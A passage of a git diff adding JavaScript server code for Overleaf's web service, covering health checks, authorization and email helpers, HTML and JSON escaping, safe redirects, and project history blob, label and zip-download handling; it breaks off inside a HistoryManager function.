+    )
+  },
+}
+
+function _extractRange(range) {
+  if (typeof range === 'string' && /\d+-\d+/.test(range)) {
+    return `bytes=${range}`
+  }
+}
+
+module.exports = FileStoreHandler
+module.exports.promises = promisifyAll(FileStoreHandler, {
+  multiResult: {
+    uploadFileFromDisk: ['url', 'fileRef', 'createdBlob'],
+    uploadFileFromDiskWithHistoryId: ['url', 'fileRef', 'createdBlob'],
+  },
+})
diff --git a/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js b/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js
new file mode 100644
index 0000000..75cbca1
--- /dev/null
+++ b/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js
@@ -0,0 +1,38 @@
+const { GlobalMetric } = require('../../models/GlobalMetric')
+/**
+ * A generic collection used to track metrics shared across the entirety of the application
+ * examples:
+ *  - a metric to measure how many signups we have for an expensive labs experiment, so we can stop signups
+ *  - a metric to measure how many users have been added to a test, so we can stop adding more once a cap is reached
+ *
+ */
+
+async function getMetric(key, defaultValue = 0) {
+  const metric = await GlobalMetric.findById(key)
+  if (!metric) {
+    return defaultValue
+  }
+  return metric.value
+}
+
+async function setMetric(key, value) {
+  return await GlobalMetric.findOneAndUpdate(
+    { _id: key },
+    { $set: { value } },
+    { new: true, upsert: true }
+  )
+}
+
+async function incrementMetric(key, value = 1) {
+  return await GlobalMetric.findOneAndUpdate(
+    { _id: key },
+    { $inc: { value } },
+    { new: true, upsert: true, setDefaultsOnInsert: true }
+  )
+}
+
+module.exports = {
+  getMetric,
+  setMetric,
+  incrementMetric,
+}
diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs b/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs
new file mode 100644
index 0000000..a6de9e5
--- /dev/null
+++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs
@@ -0,0 +1,125 @@
+import RedisWrapper from '../../infrastructure/RedisWrapper.js'
+import settings from '@overleaf/settings'
+import logger from '@overleaf/logger'
+import UserGetter from '../User/UserGetter.js'
+import {
+  SmokeTestFailure,
+  runSmokeTests,
+} from './../../../../test/smoke/src/SmokeTests.js'
+
+const rclient = RedisWrapper.client('health_check')
+
+export default {
+  check(req, res, next) {
+    if (!settings.siteIsOpen || !settings.editorIsOpen) {
+      // always return successful health checks when site is closed
+      res.sendStatus(200)
+    } else {
+      // detach from express for cleaner stack traces
+      setTimeout(() => runSmokeTestsDetached(req, res).catch(next))
+    }
+  },
+
+  checkActiveHandles(req, res, next) {
+    if (!(settings.maxActiveHandles > 0) || !process._getActiveHandles) {
+      return next()
+    }
+    const activeHandlesCount = (process._getActiveHandles() || []).length
+    if (activeHandlesCount > settings.maxActiveHandles) {
+      logger.err(
+        { activeHandlesCount, maxActiveHandles: settings.maxActiveHandles },
+        'exceeded max active handles, failing health check'
+      )
+      return res.sendStatus(500)
+    } else {
+      logger.debug(
+        { activeHandlesCount, maxActiveHandles: settings.maxActiveHandles },
+        'active handles are below maximum'
+      )
+      next()
+    }
+  },
+
+  checkApi(req, res, next) {
+    rclient.healthCheck(err => {
+      if (err) {
+        logger.err({ err }, 'failed api redis health check')
+        return res.sendStatus(500)
+      }
+      if (!settings.smokeTest.userId) {
+        logger.err({}, 'smokeTest.userId is undefined in health check')
+        return res.sendStatus(404)
+      }
+      UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => {
+        if (err) {
+          logger.err({ err }, 'failed api mongo health check')
+          return res.sendStatus(500)
+        }
+        if (email == null) {
+          logger.err({ err }, 'failed api mongo health check (no email)')
+          return res.sendStatus(500)
+        }
+        res.sendStatus(200)
+      })
+    })
+  },
+
+  checkRedis(req, res, next) {
+    return rclient.healthCheck(function (error) {
+      if (error != null) {
+        logger.err({ err: error }, 'failed redis health check')
+        return res.sendStatus(500)
+      } else {
+        return res.sendStatus(200)
+      }
+    })
+  },
+
+  checkMongo(req, res, next) {
+    return UserGetter.getUserEmail(
+      settings.smokeTest.userId,
+      function (err, email) {
+        if (err != null) {
+          logger.err({ err }, 'mongo health check failed, error present')
+          return res.sendStatus(500)
+        } else if (email == null) {
+          logger.err(
+            { err },
+            'mongo health check failed, no email present in find result'
+          )
+          return res.sendStatus(500)
+        } else {
+          return res.sendStatus(200)
+        }
+      }
+    )
+  },
+}
+
+async function runSmokeTestsDetached(req, res) {
+  function isAborted() {
+    return req.destroyed
+  }
+  const stats = { start: new Date(), steps: [] }
+  let status, response
+  try {
+    try {
+      await runSmokeTests({ isAborted, stats })
+    } finally {
+      stats.end = new Date()
+      stats.duration = stats.end - stats.start
+    }
+    status = 200
+    response = { stats }
+  } catch (e) {
+    let err = e
+    if (!(e instanceof SmokeTestFailure)) {
+      err = new SmokeTestFailure('low level error', {}, e)
+    }
+    logger.err({ err, stats }, 'health check failed')
+    status = 500
+    response = { stats, error: err.message }
+  }
+  if (isAborted()) return
+  res.status(status).json(response)
+}
diff --git a/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js b/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js
new file mode 100644
index 0000000..6a86e53
--- /dev/null
+++ b/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js
@@ -0,0 +1,19 @@
+const Settings = require('@overleaf/settings')
+
+module.exports = {
+  hasAdminAccess,
+  canRedirectToAdminDomain,
+}
+
+function hasAdminAccess(user) {
+  if (!Settings.adminPrivilegeAvailable) return false
+  if (!user) return false
+  return Boolean(user.isAdmin)
+}
+
+function canRedirectToAdminDomain(user) {
+  if (Settings.adminPrivilegeAvailable) return false
+  if (!Settings.adminUrl) return false
+  if (!user) return false
+  return Boolean(user.isAdmin)
+}
diff --git a/services/web/app/src/Features/Helpers/AsyncFormHelper.js b/services/web/app/src/Features/Helpers/AsyncFormHelper.js
new file mode 100644
index 0000000..8b8a3b6
--- /dev/null
+++ b/services/web/app/src/Features/Helpers/AsyncFormHelper.js
@@ -0,0 +1,17 @@
+const {
+  acceptsJson,
+} = require('../../infrastructure/RequestContentTypeDetection')
+
+module.exports = {
+  redirect,
+}
+
+// redirect the request via headers or JSON response depending on the request
+// format
+function redirect(req, res, redir) {
+  if (acceptsJson(req)) {
+    res.json({ redir })
+  } else {
+    res.redirect(redir)
+  }
+}
diff --git a/services/web/app/src/Features/Helpers/AuthorizationHelper.js b/services/web/app/src/Features/Helpers/AuthorizationHelper.js
new file mode 100644
index 0000000..f193398
--- /dev/null
+++ b/services/web/app/src/Features/Helpers/AuthorizationHelper.js
@@ -0,0 +1,44 @@
+const { UserSchema } = require('../../models/User')
+const SplitTestHandler = require('../SplitTests/SplitTestHandler')
+const ProjectGetter = require('../Project/ProjectGetter')
+const { callbackify } = require('@overleaf/promise-utils')
+
+module.exports = {
+  hasAnyStaffAccess,
+  isReviewerRoleEnabled: callbackify(isReviewerRoleEnabled),
+  promises: {
+    isReviewerRoleEnabled,
+  },
+}
+
+function hasAnyStaffAccess(user) {
+  if (!user.staffAccess) {
+    return false
+  }
+
+  for (const key of Object.keys(UserSchema.obj.staffAccess)) {
+    if (user.staffAccess[key]) return true
+  }
+  return false
+}
+
+async function isReviewerRoleEnabled(projectId) {
+  const project = await ProjectGetter.promises.getProject(projectId, {
+    reviewer_refs: 1,
+    owner_ref: 1,
+  })
+
+  // if there are reviewers, it means the role is enabled
+  if (Object.keys(project.reviewer_refs || {}).length > 0) {
+    return true
+  }
+
+  // if there are no reviewers, check split test from project owner
+  const reviewerRoleAssignment =
+    await SplitTestHandler.promises.getAssignmentForUser(
+      project.owner_ref,
+      'reviewer-role'
+    )
+
+  return reviewerRoleAssignment.variant === 'enabled'
+}
diff --git a/services/web/app/src/Features/Helpers/DiffHelper.js b/services/web/app/src/Features/Helpers/DiffHelper.js
new file mode 100644
index 0000000..c2d1d73
--- /dev/null
+++ b/services/web/app/src/Features/Helpers/DiffHelper.js
@@ -0,0 +1,55 @@
+const MAX_LENGTH = 254
+
+function _calculateRatio(matches, length) {
+  if (length) {
+    const ratio = (2.0 * matches) / length
+    const rounded = Math.floor(ratio * 100) / 100
+    return rounded
+  }
+  return 1.0
+}
+
+/**
+ * Ported from python's `difflib`:
+ * https://github.com/python/cpython/blob/0415cf895f96ae3f896f1f25f0c030a820845e13/Lib/difflib.py#L622-L649
+ *
+ * Accepts two strings, `a` and `b`, and returns a float ratio
+ * corresponding (approximately) to the overlap between the strings.
+ * Identical strings produce 1.0, completely different strings produce 0.0
+ * */
+function stringSimilarity(a, b) {
+  if (
+    typeof a !== 'string' ||
+    typeof b !== 'string' ||
+    a.length > MAX_LENGTH ||
+    b.length > MAX_LENGTH
+  ) {
+    throw new Error('Invalid input to stringSimilarity')
+  }
+  // Count how many times each character occurs in `b`
+  const fullBCount = {}
+  b.split('').forEach(e => {
+    fullBCount[e] = (fullBCount[e] || 0) + 1
+  })
+  // avail[x] is the number of times x appears in 'b' less the
+  // number of times we've seen it in 'a' so far ... kinda
+  const avail = {}
+  let matches = 0
+  a.split('').forEach(e => {
+    let n = null
+    if (Object.hasOwn(avail, e)) {
+      n = avail[e]
+    } else {
+      n = fullBCount[e] || 0
+    }
+    avail[e] = n - 1
+    if (n > 0) {
+      matches = matches + 1
+    }
+  })
+  return _calculateRatio(matches, a.length + b.length)
+}
+
+module.exports = {
+  stringSimilarity,
+}
diff --git a/services/web/app/src/Features/Helpers/EmailHelper.js b/services/web/app/src/Features/Helpers/EmailHelper.js
new file mode 100644
index 0000000..80b96df
--- /dev/null
+++ b/services/web/app/src/Features/Helpers/EmailHelper.js
@@ -0,0 +1,42 @@
+const { parseOneAddress } = require('email-addresses')
+
+// available for frontend in https://github.com/overleaf/internal/blob/19d432c70b173752ee7c6d8978dd6be16b042921/services/web/frontend/js/shared/utils/email.tsx#L4
+const EMAIL_REGEXP =
+  // eslint-disable-next-line no-useless-escape
+  /^([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/
+
+function getDomain(email) {
+  email = parseEmail(email)
+  return email ?
email.split('@').pop() : null +} + +function parseEmail(email, parseRfcAddress = false) { + if (typeof email !== 'string' || !email) { + return null + } + + if (parseRfcAddress) { + const result = parseOneAddress(email) + if (!result?.address) { + return null + } + email = result.address + } + + if (email.length > 254) { + return null + } + email = email.trim().toLowerCase() + + const matched = email.match(EMAIL_REGEXP) + if (matched == null || matched[0] == null) { + return null + } + + return matched[0] +} + +module.exports = { + getDomain, + parseEmail, +} diff --git a/services/web/app/src/Features/Helpers/Mongo.js b/services/web/app/src/Features/Helpers/Mongo.js new file mode 100644 index 0000000..3ec083a --- /dev/null +++ b/services/web/app/src/Features/Helpers/Mongo.js @@ -0,0 +1,54 @@ +const OError = require('@overleaf/o-error') +const { ObjectId } = require('mongodb-legacy') +const { ObjectId: MongooseObjectId } = require('mongoose').mongo + +function _getObjectIdInstance(id) { + if (typeof id === 'string') { + return new ObjectId(id) + } else if (id instanceof ObjectId) { + return id + } else if (id instanceof MongooseObjectId) { + return new ObjectId(id.toString()) + } else { + throw new OError('unexpected object id', { id }) + } +} + +function normalizeQuery(query) { + if (!query) { + throw new Error('no query provided') + } + if ( + typeof query === 'string' || + query instanceof ObjectId || + query instanceof MongooseObjectId + ) { + return { _id: _getObjectIdInstance(query) } + } else if (typeof query._id === 'string') { + query._id = new ObjectId(query._id) + return query + } else { + return query + } +} + +function normalizeMultiQuery(query) { + if (query instanceof Set) { + query = Array.from(query) + } + if (Array.isArray(query)) { + return { _id: { $in: query.map(id => _getObjectIdInstance(id)) } } + } else { + return normalizeQuery(query) + } +} + +function isObjectIdInstance(id) { + return id instanceof ObjectId || id instanceof MongooseObjectId +} + +module.exports = { + isObjectIdInstance, + normalizeQuery, + normalizeMultiQuery, +} diff --git a/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js b/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js new file mode 100644 index 0000000..4ae40d8 --- /dev/null +++ b/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js @@ -0,0 +1,46 @@ +const pug = require('pug-runtime') + +const SPLIT_REGEX = /<(\d+)>(.*?)<\/\1>/g + +function render(locale, components) { + const output = [] + function addPlainText(text) { + if (!text) return + output.push(pug.escape(text)) + } + + // 'PRE<0>INNER</0>POST' -> ['PRE', '0', 'INNER', 'POST'] + // '<0>INNER</0>' -> ['', '0', 'INNER', ''] + // '<0></0>' -> ['', '0', '', ''] + // '<0>INNER</0><0>INNER2</0>' -> ['', '0', 'INNER', '', '0', 'INNER2', ''] + // '<0><1>INNER</1></0>' -> ['', '0', '<1>INNER</1>', ''] + // 'PLAIN TEXT' -> ['PLAIN TEXT'] + // NOTE: a test suite is verifying these cases: SafeHTMLSubstituteTests + const chunks = locale.split(SPLIT_REGEX) + + // extract the 'PRE' chunk + addPlainText(chunks.shift()) + + while (chunks.length) { + // each batch consists of three chunks: ['0', 'INNER', 'POST'] + const [idx, innerChunk, intermediateChunk] = chunks.splice(0, 3) + + const component = components[idx] + const componentName = + typeof component === 'string' ? 
component : component.name + // pug is doing any necessary escaping on attribute values + const attributes = (component.attrs && pug.attrs(component.attrs)) || '' + output.push( + `<${componentName + attributes}>`, + ...render(innerChunk, components), + `</${componentName}>` + ) + addPlainText(intermediateChunk) + } + return output.join('') +} + +module.exports = { + SPLIT_REGEX, + render, +} diff --git a/services/web/app/src/Features/Helpers/StringHelper.js b/services/web/app/src/Features/Helpers/StringHelper.js new file mode 100644 index 0000000..47f71df --- /dev/null +++ b/services/web/app/src/Features/Helpers/StringHelper.js @@ -0,0 +1,30 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +let StringHelper +const JSON_ESCAPE_REGEXP = /[\u2028\u2029&><]/g + +const JSON_ESCAPE = { + '&': '\\u0026', + '>': '\\u003e', + '<': '\\u003c', + '\u2028': '\\u2028', + '\u2029': '\\u2029', +} + +module.exports = StringHelper = { + // stringifies and escapes a json object for use in a script. This ensures that &, < and > characters are escaped, + // along with quotes. This ensures that the string can be safely rendered into HTML. See rationale at: + // https://api.rubyonrails.org/classes/ERB/Util.html#method-c-json_escape + // and implementation lifted from: + // https://github.com/ember-fastboot/fastboot/blob/cafd96c48564d8384eb83dc908303dba8ece10fd/src/ember-app.js#L496-L510 + stringifyJsonForScript(object) { + return JSON.stringify(object).replace( + JSON_ESCAPE_REGEXP, + match => JSON_ESCAPE[match] + ) + }, +} diff --git a/services/web/app/src/Features/Helpers/UrlHelper.js b/services/web/app/src/Features/Helpers/UrlHelper.js new file mode 100644 index 0000000..cf68663 --- /dev/null +++ b/services/web/app/src/Features/Helpers/UrlHelper.js @@ -0,0 +1,49 @@ +const Settings = require('@overleaf/settings') +const { URL } = require('url') + +const PROTO = new URL(Settings.siteUrl).protocol + +function getCanonicalURL(req, url) { + const origin = `${PROTO}//${req.headers.host}` + url = new URL(url || req.originalUrl, origin) + if (url.pathname.endsWith('/')) { + url.pathname = url.pathname.replace(/\/+$/, '') + } + url.search = '' + url.hash = '' + return url.href +} + +function getSafeRedirectPath(value) { + const baseURL = Settings.siteUrl // base URL is required to construct URL from path + const url = new URL(value, baseURL) + let safePath = `${url.pathname}${url.search}${url.hash}`.replace(/^\/+/, '/') + if (safePath === '/') { + safePath = undefined + } + return safePath +} + +function getSafeAdminDomainRedirect(path) { + return Settings.adminUrl + (getSafeRedirectPath(path) || '/') +} + +module.exports = { + getCanonicalURL, + getSafeRedirectPath, + getSafeAdminDomainRedirect, + wrapUrlWithProxy(url) { + // TODO: Consider what to do for Community and Enterprise edition? 
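+    // For example (illustrative values only): with linkedUrlProxy.url set to
+    // 'http://proxy:8080/proxy', wrapUrlWithProxy('https://example.com/a.png')
+    // returns 'http://proxy:8080/proxy?url=https%3A%2F%2Fexample.com%2Fa.png'.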
+ if (!Settings.apis.linkedUrlProxy.url) { + throw new Error('no linked url proxy configured') + } + return `${Settings.apis.linkedUrlProxy.url}?url=${encodeURIComponent(url)}` + }, + + prependHttpIfNeeded(url) { + if (!url.match('://')) { + url = `http://${url}` + } + return url + }, +} diff --git a/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js b/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js new file mode 100644 index 0000000..8df1bcd --- /dev/null +++ b/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js @@ -0,0 +1,20 @@ +const { fetchNothing } = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') + +async function deleteProject(projectId) { + if (!Settings.apis.historyBackupDeletion.enabled) return + + const url = new URL(Settings.apis.historyBackupDeletion.url) + url.pathname += `project/${projectId}/backup` + await fetchNothing(url, { + method: 'DELETE', + basicAuth: { + user: Settings.apis.historyBackupDeletion.user, + password: Settings.apis.historyBackupDeletion.pass, + }, + }) +} + +module.exports = { + deleteProject, +} diff --git a/services/web/app/src/Features/History/HistoryController.js b/services/web/app/src/Features/History/HistoryController.js new file mode 100644 index 0000000..a0f0183 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryController.js @@ -0,0 +1,502 @@ +// @ts-check + +const { setTimeout } = require('timers/promises') +const { pipeline } = require('stream/promises') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const { + fetchStream, + fetchStreamWithResponse, + fetchJson, + fetchNothing, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const Errors = require('../Errors/Errors') +const HistoryManager = require('./HistoryManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectEntityUpdateHandler = require('../Project/ProjectEntityUpdateHandler') +const RestoreManager = require('./RestoreManager') +const { prepareZipAttachment } = require('../../infrastructure/Response') +const Features = require('../../infrastructure/Features') + +// Number of seconds after which the browser should send a request to revalidate +// blobs +const REVALIDATE_BLOB_AFTER_SECONDS = 86400 // 1 day + +// Number of seconds during which the browser can serve a stale response while +// revalidating +const STALE_WHILE_REVALIDATE_SECONDS = 365 * 86400 // 1 year + +const MAX_HISTORY_ZIP_ATTEMPTS = 40 + +async function getBlob(req, res) { + await requestBlob('GET', req, res) +} + +async function headBlob(req, res) { + await requestBlob('HEAD', req, res) +} + +async function requestBlob(method, req, res) { + const { project_id: projectId, hash } = req.params + + // Handle conditional GET request + if (req.get('If-None-Match') === hash) { + setBlobCacheHeaders(res, hash) + return res.status(304).end() + } + + const range = req.get('Range') + let stream, source, contentLength + try { + ;({ stream, source, contentLength } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + hash, + req.query.fallback, + method, + range + )) + } catch (err) { + if (err instanceof Errors.NotFoundError) return 
res.status(404).end() + throw err + } + res.appendHeader('X-Served-By', source) + + if (contentLength) res.setHeader('Content-Length', contentLength) // set on HEAD + res.setHeader('Content-Type', 'application/octet-stream') + setBlobCacheHeaders(res, hash) + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE, ignore these "errors". + if (!isPrematureClose(err)) { + throw err + } + } +} + +function setBlobCacheHeaders(res, etag) { + // Blobs are immutable, so they can in principle be cached indefinitely. Here, + // we ask the browser to cache them for some time, but then check back + // regularly in case they changed (even though they shouldn't). This is a + // precaution in case a bug makes us send bad data through that endpoint. + res.set( + 'Cache-Control', + `private, max-age=${REVALIDATE_BLOB_AFTER_SECONDS}, stale-while-revalidate=${STALE_WHILE_REVALIDATE_SECONDS}` + ) + res.set('ETag', etag) +} + +async function proxyToHistoryApi(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const url = settings.apis.project_history.url + req.url + + const { stream, response } = await fetchStreamWithResponse(url, { + method: req.method, + headers: { 'X-User-Id': userId }, + }) + + const contentType = response.headers.get('Content-Type') + const contentLength = response.headers.get('Content-Length') + if (contentType != null) { + res.set('Content-Type', contentType) + } + if (contentLength != null) { + res.set('Content-Length', contentLength) + } + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE. + if (!isPrematureClose(err)) { + throw err + } + } +} + +async function proxyToHistoryApiAndInjectUserDetails(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const url = settings.apis.project_history.url + req.url + const body = await fetchJson(url, { + method: req.method, + headers: { 'X-User-Id': userId }, + }) + const data = await HistoryManager.promises.injectUserDetails(body) + res.json(data) +} + +async function resyncProjectHistory(req, res, next) { + // increase timeout to 6 minutes + res.setTimeout(6 * 60 * 1000) + const projectId = req.params.Project_id + const opts = {} + const historyRangesMigration = req.body.historyRangesMigration + if (historyRangesMigration) { + opts.historyRangesMigration = historyRangesMigration + } + if (req.body.resyncProjectStructureOnly) { + opts.resyncProjectStructureOnly = req.body.resyncProjectStructureOnly + } + + try { + await ProjectEntityUpdateHandler.promises.resyncProjectHistory( + projectId, + opts + ) + } catch (err) { + if (err instanceof Errors.ProjectHistoryDisabledError) { + return res.sendStatus(404) + } else { + throw err + } + } + + res.sendStatus(204) +} + +async function restoreFileFromV2(req, res, next) { + const { project_id: projectId } = req.params + const { version, pathname } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const entity = await RestoreManager.promises.restoreFileFromV2( + userId, + projectId, + version, + pathname + ) + + res.json({ + type: entity.type, + id: entity._id, + }) +} + +async function revertFile(req, res, next) { + const { project_id: projectId } = req.params + const { version, pathname } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const entity = await RestoreManager.promises.revertFile( + userId, + 
projectId, + version, + pathname, + {} + ) + + res.json({ + type: entity.type, + id: entity._id, + }) +} + +async function revertProject(req, res, next) { + const { project_id: projectId } = req.params + const { version } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + await RestoreManager.promises.revertProject(userId, projectId, version) + + res.sendStatus(200) +} + +async function getLabels(req, res, next) { + const projectId = req.params.Project_id + + let labels = await fetchJson( + `${settings.apis.project_history.url}/project/${projectId}/labels` + ) + labels = await _enrichLabels(labels) + + res.json(labels) +} + +async function createLabel(req, res, next) { + const projectId = req.params.Project_id + const { comment, version } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + let label = await fetchJson( + `${settings.apis.project_history.url}/project/${projectId}/labels`, + { + method: 'POST', + json: { comment, version, user_id: userId }, + } + ) + label = await _enrichLabel(label) + + res.json(label) +} + +async function _enrichLabel(label) { + const newLabel = Object.assign({}, label) + if (!label.user_id) { + newLabel.user_display_name = _displayNameForUser(null) + return newLabel + } + + const user = await UserGetter.promises.getUser(label.user_id, { + first_name: 1, + last_name: 1, + email: 1, + }) + newLabel.user_display_name = _displayNameForUser(user) + return newLabel +} + +async function _enrichLabels(labels) { + if (!labels || !labels.length) { + return [] + } + const uniqueUsers = new Set(labels.map(label => label.user_id)) + + // For backwards compatibility, and for anonymously created labels in SP + // expect missing user_id fields + uniqueUsers.delete(undefined) + + if (!uniqueUsers.size) { + return labels + } + + const rawUsers = await UserGetter.promises.getUsers(Array.from(uniqueUsers), { + first_name: 1, + last_name: 1, + email: 1, + }) + const users = new Map(rawUsers.map(user => [String(user._id), user])) + + labels.forEach(label => { + const user = users.get(label.user_id) + label.user_display_name = _displayNameForUser(user) + }) + return labels +} + +function _displayNameForUser(user) { + if (user == null) { + return 'Anonymous' + } + if (user.name) { + return user.name + } + let name = [user.first_name, user.last_name] + .filter(n => n != null) + .join(' ') + .trim() + if (name === '') { + name = user.email.split('@')[0] + } + if (!name) { + return '?' + } + return name +} + +async function deleteLabel(req, res, next) { + const { Project_id: projectId, label_id: labelId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: true, + }) + + // If the current user is the project owner, we can use the non-user-specific + // delete label endpoint. Otherwise, we have to use the user-specific version + // (which only deletes the label if it is owned by the user) + const deleteEndpointUrl = project.owner_ref.equals(userId) + ? 
`${settings.apis.project_history.url}/project/${projectId}/labels/${labelId}` + : `${settings.apis.project_history.url}/project/${projectId}/user/${userId}/labels/${labelId}` + + await fetchNothing(deleteEndpointUrl, { + method: 'DELETE', + }) + res.sendStatus(204) +} + +async function downloadZipOfVersion(req, res, next) { + const { project_id: projectId, version } = req.params + + const project = await ProjectDetailsHandler.promises.getDetails(projectId) + const v1Id = + project.overleaf && project.overleaf.history && project.overleaf.history.id + + if (v1Id == null) { + logger.error( + { projectId, version }, + 'got request for zip version of non-v1 history project' + ) + return res.sendStatus(402) + } + + await _pipeHistoryZipToResponse( + v1Id, + version, + `${project.name} (Version ${version})`, + req, + res + ) +} + +async function _pipeHistoryZipToResponse(v1ProjectId, version, name, req, res) { + if (req.destroyed) { + // client has disconnected -- skip project history api call and download + return + } + // increase timeout to 6 minutes + res.setTimeout(6 * 60 * 1000) + const url = `${settings.apis.v1_history.url}/projects/${v1ProjectId}/version/${version}/zip` + const basicAuth = { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, + } + + if (!Features.hasFeature('saas')) { + let stream + try { + stream = await fetchStream(url, { basicAuth }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + return res.sendStatus(404) + } else { + throw err + } + } + + prepareZipAttachment(res, `${name}.zip`) + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE. + if (!isPrematureClose(err)) { + throw err + } + } + return + } + + let body + try { + body = await fetchJson(url, { method: 'POST', basicAuth }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError('zip not found') + } else { + throw err + } + } + + if (req.destroyed) { + // client has disconnected -- skip delayed s3 download + return + } + + if (!body.zipUrl) { + throw new OError('Missing zipUrl, cannot fetch zip file', { + v1ProjectId, + body, + }) + } + + // retry for about 6 minutes starting with short delay + let retryDelay = 2000 + let attempt = 0 + while (true) { + attempt += 1 + await setTimeout(retryDelay) + + if (req.destroyed) { + // client has disconnected -- skip s3 download + return + } + + // increase delay by 1 second up to 10 + if (retryDelay < 10000) { + retryDelay += 1000 + } + + try { + const stream = await fetchStream(body.zipUrl) + prepareZipAttachment(res, `${name}.zip`) + await pipeline(stream, res) + } catch (err) { + if (attempt > MAX_HISTORY_ZIP_ATTEMPTS) { + throw err + } + + if (err instanceof RequestFailedError && err.response.status === 404) { + // File not ready yet. Retry. + continue + } else if (isPrematureClose(err)) { + // Downstream request cancelled. Retry. + continue + } else { + // Unknown error. Log and retry. + logger.warn( + { err, v1ProjectId, version, retryAttempt: attempt }, + 'history s3 proxying error' + ) + continue + } + } + + // We made it through. No need to retry anymore. 
Exit loop + break + } +} + +async function getLatestHistory(req, res, next) { + const projectId = req.params.project_id + const history = await HistoryManager.promises.getLatestHistory(projectId) + res.json(history) +} + +async function getChanges(req, res, next) { + const projectId = req.params.project_id + const since = req.query.since + const changes = await HistoryManager.promises.getChanges(projectId, { since }) + res.json(changes) +} + +function isPrematureClose(err) { + return ( + err instanceof Error && + 'code' in err && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) +} + +module.exports = { + getBlob: expressify(getBlob), + headBlob: expressify(headBlob), + proxyToHistoryApi: expressify(proxyToHistoryApi), + proxyToHistoryApiAndInjectUserDetails: expressify( + proxyToHistoryApiAndInjectUserDetails + ), + resyncProjectHistory: expressify(resyncProjectHistory), + restoreFileFromV2: expressify(restoreFileFromV2), + revertFile: expressify(revertFile), + revertProject: expressify(revertProject), + getLabels: expressify(getLabels), + createLabel: expressify(createLabel), + deleteLabel: expressify(deleteLabel), + downloadZipOfVersion: expressify(downloadZipOfVersion), + getLatestHistory: expressify(getLatestHistory), + getChanges: expressify(getChanges), + _displayNameForUser, + promises: { + _pipeHistoryZipToResponse, + }, +} diff --git a/services/web/app/src/Features/History/HistoryManager.js b/services/web/app/src/Features/History/HistoryManager.js new file mode 100644 index 0000000..6e40907 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryManager.js @@ -0,0 +1,450 @@ +const { callbackify } = require('util') +const { + fetchJson, + fetchNothing, + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const fs = require('fs') +const settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const HistoryBackupDeletionHandler = require('./HistoryBackupDeletionHandler') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const { NotFoundError } = require('../Errors/Errors') +const projectKey = require('./project_key') + +// BEGIN copy from services/history-v1/storage/lib/blob_store/index.js + +const GLOBAL_BLOBS = new Set() // CHANGE FROM SOURCE: only store hashes. + +const HISTORY_V1_URL = settings.apis.v1_history.url +const HISTORY_V1_BASIC_AUTH = { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, +} + +function makeGlobalKey(hash) { + return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}` +} + +function makeProjectKey(projectId, hash) { + return `${projectKey.format(projectId)}/${hash.slice(0, 2)}/${hash.slice(2)}` +} + +function getBlobLocation(projectId, hash) { + if (GLOBAL_BLOBS.has(hash)) { + return { + bucket: settings.apis.v1_history.buckets.globalBlobs, + key: makeGlobalKey(hash), + } + } else { + return { + bucket: settings.apis.v1_history.buckets.projectBlobs, + key: makeProjectKey(projectId, hash), + } + } +} + +async function loadGlobalBlobs() { + const blobs = db.projectHistoryGlobalBlobs.find() + for await (const blob of blobs) { + 